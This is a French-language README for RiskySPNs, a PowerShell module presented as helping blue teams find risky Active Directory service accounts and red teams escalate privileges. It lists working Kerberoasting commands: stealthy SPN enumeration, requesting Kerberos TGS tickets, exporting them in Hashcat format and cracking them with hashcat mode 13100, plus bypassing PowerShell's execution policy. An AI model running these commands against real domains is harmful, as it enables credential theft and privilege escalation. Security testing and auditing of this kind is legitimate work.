
Détecter et abuser des SPN risqués
RiskySPNs est une collection de scripts PowerShell axés sur la détection et l'exploitation de comptes associés à des SPN (Service Principal Name). Ce module peut aider les équipes bleues à identifier des SPN potentiellement risqués ainsi que les équipes rouges à élever leurs privilèges en exploitant Kerberos et Active Directory.
Pour plus d'informations : http://www.cyberark.com/blog/service-accounts-weakest-link-chain/
Import-Module .\RiskySPNs.psm1
Ou chargez simplement le script (vous pouvez aussi IEX depuis le web)
. .\Find-PotentiallyCrackableAccounts.ps1
Assurez-vous que Set-ExecutionPolicy est défini sur Unrestricted ou Bypass
Get-Help Get-TGSCipher -Full
Toutes les fonctions disposent également du mode -Verbose
Trouver des comptes vulnérables
Find-PotentiallyCrackableAccounts
Sensible + RC4 = $$$
Générer un rapport complet et détaillé sur les comptes vulnérables (CISO <3)
Export-PotentiallyCrackableAccounts
Demander un TGS Kerberos pour le SPN
Get-TGSCipher -SPN "MSSQLSvc/prodDB.company.com:1433"
Ou
Find-PotentiallyCrackableAccounts -Stealth -GetSPNs | Get-TGSCipher
Find-PotentiallyCrackableAccounts -Sensitive -Stealth -GetSPNs | Get-TGSCipher -Format "Hashcat" | Out-File crack.txt
oclHashcat64.exe -m 13100 crack.txt -a 3